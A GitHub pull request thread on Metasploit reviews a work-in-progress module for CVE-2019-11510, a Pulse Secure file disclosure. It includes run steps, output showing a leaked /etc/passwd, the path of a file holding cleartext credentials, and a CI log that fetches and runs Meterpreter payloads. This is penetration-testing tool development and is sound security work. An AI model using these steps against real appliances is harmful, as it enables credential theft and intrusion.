[WIP] Module for CVE-2019-11510 - Pulse Secure File Disclosure by 0xDezzy · Pull Request #12220 · rapid7/metasploit-framework

0xDezzy · 2019-08-21T13:05:02Z

This is a work in progress exploit for CVE-2019-11510

It grabs /etc/passwd and displays it to the terminal

Verification

List the steps needed to make sure this thing works

Start msfconsole
Do use exploit/linux/http/pulse_secure_file_leak
Do set RHOSTS [Pulse secure instance]
Do run

Execution

msf5 auxiliary(linux/http/pulse_secure_file_leak) > run
[*] Running module against ***.***.***.***

[+] Checking...
[+] Target is Vulnerable!
[+] Parsing file.......
[+] root:x:0:0:root:/:/bin/bash.
[+] nfast:x:0:0:nfast:/:/bin/bash.
[+] bin:x:1:1:bin:/:.
[+] nobody:x:99:99:Nobody:/:.
[+] dns:x:98:98:DNS:/:.
[+] term:x:97:97:Telnet/SSH:/:.
[+] web80:x:96:96:Port 80 web:/:.
[+] rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin.
[+] postgres:x:102:102:PostgreSQL User:/:.
[*] Auxiliary module execution completed

0xDezzy · 2019-08-21T13:10:14Z

This can be leveraged to gain clear text credentials by grabbing /data/runtime/mtmp/lmdb/dataa/data.mdb?.

I'm working on an updated version that will allow you to grab this binary file, parse it, and show the credentials but this is also my first Metasploit module.

bcoles · 2019-08-21T13:13:12Z

Please use two spaces instead of tabs for indentation. It would also be a good idea to run msftidy over your module. msftidy can be found in ./tools/dev/

Additionally, you may want to use store_loot to store the /etc/passwd file.

0xDezzy · 2019-08-21T13:14:06Z

Thanks! I'll go ahead and do that!

bcoles · 2019-08-21T13:21:53Z

Presumably files other than /etc/passwd can be retrieved? I recommend taking a look at some of the existing path traversal modules (ls -R modules | grep traversal) for sample code. Traditionally, file disclosure traversal modules offer options to set both the file path and traversal depth (grep -rn DEPTH modules for examples).

Additionally, exploit modules are expected to return a session. As this module does not return a session, it belongs in the auxiliary/http category, along with other HTTP based traversal modules.

~~Also, while parsing the passwd file is a nice-to-have feature, it would be much easier to simply store the file as loot (grep -rn store_loot modules for examples).~~ Also, please use store_loot to store the downloaded file, rather than rolling your own file storage functionality (grep -rn store_loot modules for examples).

bcoles · 2019-08-21T13:23:23Z

modules/exploits/linux/http/pulse_secure_file_disclosure.rb

@@ -0,0 +1,73 @@
+# Quick hackish exploit for the CVE-2019-11510


Presuming that you wish to license this module for use in Metasploit, please use the standard comment header here.

modules/exploits/linux/http/pulse_secure_file_disclosure.rb

bcoles · 2019-08-21T13:29:15Z

modules/exploits/linux/http/pulse_secure_file_disclosure.rb

+			data = res.body
+			current_host = datastore['RHOST']
+			filename = "msf_sslwebsession_"+current_host+".bin"
+			File.delete(filename) if File.exist?(filename)


Please use store_loot rather than rolling your own file storage functionality.

bcoles · 2019-08-21T13:30:45Z

modules/exploits/linux/http/pulse_secure_file_disclosure.rb

+			end
+		end
+	end
+	def parse()


I'm not really sure what this does, but I'm fairly sure it won't work as intended, especially if the retrieved file is not ASCII.

I presume you're trying to extract the file contents from the HTTP response? Are there any delimiters you can use? This parsing looks brittle.

bwatters-r7 · 2019-08-21T15:51:55Z

I think the sanity testing failures are unrelated to this PR:

TESTING
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
LAUNCHING C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
FAILED TO RUN C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
LAUNCHING C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
FAILED TO RUN C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe:
[Error 1392] The file or directory is corrupted and unreadable

bcoles · 2019-08-21T16:37:45Z

A bit late now, however, for future reference, you can use git mv, to rename/move a file, rather than deleting it.

0xDezzy · 2019-08-21T17:37:25Z

I was deleting it because I rewrote the entire thing. I will be committing it to the proper directory as well. I will keep that in mind though.

Never really made a PR before so forgive me for the mistakes.

bwatters-r7 · 2019-08-21T18:37:04Z

@0xDezzy no worries. The only people who have never screwed up git are people who have never used git.
It looks like you deleted your changes?

Do you still want this PR open?

0xDezzy · 2019-08-21T18:39:51Z

Yeah, I'm going to push another commit with an updated version

bcoles · 2019-08-23T06:56:42Z